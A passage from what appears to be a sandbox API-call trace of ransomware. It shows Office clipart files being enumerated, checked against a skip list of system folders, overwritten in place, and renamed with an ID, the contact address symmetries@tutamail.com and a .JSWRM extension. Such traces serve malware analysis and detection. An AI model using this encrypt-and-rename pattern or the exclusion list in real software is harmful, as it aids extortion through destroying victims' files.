lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3946e4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3946e4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3946e4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x795c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0285780.WMF", cAlternateFileName="")) returned 1 [0088.750] lstrcmpiW (lpString1="J0285780.WMF", lpString2=".") returned 1 [0088.750] lstrcmpiW (lpString1="J0285780.WMF", lpString2="..") returned 1 [0088.750] lstrcmpiW (lpString1="J0285780.WMF", lpString2="...") returned 1 [0088.750] lstrcmpiW (lpString1="J0285780.WMF", lpString2="windows") returned -1 [0088.750] lstrcmpiW (lpString1="J0285780.WMF", lpString2="recovery") returned -1 [0088.750] lstrcmpiW (lpString1="J0285780.WMF", lpString2="perflogs") returned -1 [0088.750] lstrcmpiW (lpString1="J0285780.WMF", lpString2="documents and settings") returned 1 [0088.750] lstrcmpiW (lpString1="J0285780.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.750] lstrcmpiW (lpString1="J0285780.WMF", lpString2="system volume information") returned -1 [0088.750] lstrcmpiW (lpString1="J0285780.WMF", lpString2="msocache") returned -1 [0088.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0088.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0285780.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0285780.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0285780.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0088.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0088.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0285780.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.751] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0285780.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0285780.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.751] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0088.751] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0088.751] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0088.751] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.751] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.751] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0088.751] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285780.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285780.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.751] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=31068) returned 1 [0088.751] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.751] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7950) returned 0x24d210 [0088.751] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7950, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7950, lpOverlapped=0x0) returned 1 [0088.756] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.756] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7950, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7950, lpOverlapped=0x0) returned 1 [0088.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.757] CloseHandle (hObject=0x314) returned 1 [0088.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0088.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0088.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0088.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0088.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0088.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0088.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0088.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0088.758] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285780.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285780.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285780.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285780.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0088.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0088.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0088.759] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf36e46d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf36e46d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3946e4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x523e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0285782.WMF", cAlternateFileName="")) returned 1 [0088.759] lstrcmpiW (lpString1="J0285782.WMF", lpString2=".") returned 1 [0088.759] lstrcmpiW (lpString1="J0285782.WMF", lpString2="..") returned 1 [0088.759] lstrcmpiW (lpString1="J0285782.WMF", lpString2="...") returned 1 [0088.759] lstrcmpiW (lpString1="J0285782.WMF", lpString2="windows") returned -1 [0088.759] lstrcmpiW (lpString1="J0285782.WMF", lpString2="recovery") returned -1 [0088.759] lstrcmpiW (lpString1="J0285782.WMF", lpString2="perflogs") returned -1 [0088.759] lstrcmpiW (lpString1="J0285782.WMF", lpString2="documents and settings") returned 1 [0088.759] lstrcmpiW (lpString1="J0285782.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.759] lstrcmpiW (lpString1="J0285782.WMF", lpString2="system volume information") returned -1 [0088.759] lstrcmpiW (lpString1="J0285782.WMF", lpString2="msocache") returned -1 [0088.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0088.759] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0285782.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.759] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0285782.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0285782.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0088.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0088.759] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0285782.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.759] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0285782.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0285782.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0088.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0088.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0088.759] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.759] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0088.759] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285782.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285782.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.765] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=21054) returned 1 [0088.765] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5230) returned 0x24d210 [0088.766] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5230, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5230, lpOverlapped=0x0) returned 1 [0088.768] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.769] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5230, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5230, lpOverlapped=0x0) returned 1 [0088.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.769] CloseHandle (hObject=0x314) returned 1 [0088.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0088.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0088.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0088.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0088.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0088.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0088.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.769] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285782.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285782.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285782.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285782.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0088.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0088.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0088.770] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf36e46d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf36e46d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3946e4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2eb4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0285792.WMF", cAlternateFileName="")) returned 1 [0088.770] lstrcmpiW (lpString1="J0285792.WMF", lpString2=".") returned 1 [0088.770] lstrcmpiW (lpString1="J0285792.WMF", lpString2="..") returned 1 [0088.770] lstrcmpiW (lpString1="J0285792.WMF", lpString2="...") returned 1 [0088.770] lstrcmpiW (lpString1="J0285792.WMF", lpString2="windows") returned -1 [0088.770] lstrcmpiW (lpString1="J0285792.WMF", lpString2="recovery") returned -1 [0088.770] lstrcmpiW (lpString1="J0285792.WMF", lpString2="perflogs") returned -1 [0088.770] lstrcmpiW (lpString1="J0285792.WMF", lpString2="documents and settings") returned 1 [0088.770] lstrcmpiW (lpString1="J0285792.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.770] lstrcmpiW (lpString1="J0285792.WMF", lpString2="system volume information") returned -1 [0088.770] lstrcmpiW (lpString1="J0285792.WMF", lpString2="msocache") returned -1 [0088.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0088.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0285792.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0285792.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0285792.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0088.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0088.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0285792.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0285792.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0285792.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0088.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0088.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0088.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0088.771] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285792.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285792.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.772] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11956) returned 1 [0088.772] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2eb0) returned 0x24d210 [0088.772] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2eb0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2eb0, lpOverlapped=0x0) returned 1 [0088.776] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.776] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2eb0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2eb0, lpOverlapped=0x0) returned 1 [0088.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.776] CloseHandle (hObject=0x314) returned 1 [0088.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0088.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0088.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0088.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0088.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0088.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0088.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.777] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285792.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285792.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285792.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285792.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0088.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0088.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0088.777] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf36e46d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf36e46d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf36e46d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3550, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0285796.WMF", cAlternateFileName="")) returned 1 [0088.777] lstrcmpiW (lpString1="J0285796.WMF", lpString2=".") returned 1 [0088.777] lstrcmpiW (lpString1="J0285796.WMF", lpString2="..") returned 1 [0088.777] lstrcmpiW (lpString1="J0285796.WMF", lpString2="...") returned 1 [0088.777] lstrcmpiW (lpString1="J0285796.WMF", lpString2="windows") returned -1 [0088.777] lstrcmpiW (lpString1="J0285796.WMF", lpString2="recovery") returned -1 [0088.777] lstrcmpiW (lpString1="J0285796.WMF", lpString2="perflogs") returned -1 [0088.777] lstrcmpiW (lpString1="J0285796.WMF", lpString2="documents and settings") returned 1 [0088.778] lstrcmpiW (lpString1="J0285796.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.778] lstrcmpiW (lpString1="J0285796.WMF", lpString2="system volume information") returned -1 [0088.778] lstrcmpiW (lpString1="J0285796.WMF", lpString2="msocache") returned -1 [0088.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0088.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0285796.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0285796.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0285796.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0088.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0088.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0285796.WMF", cchWideChar=12, 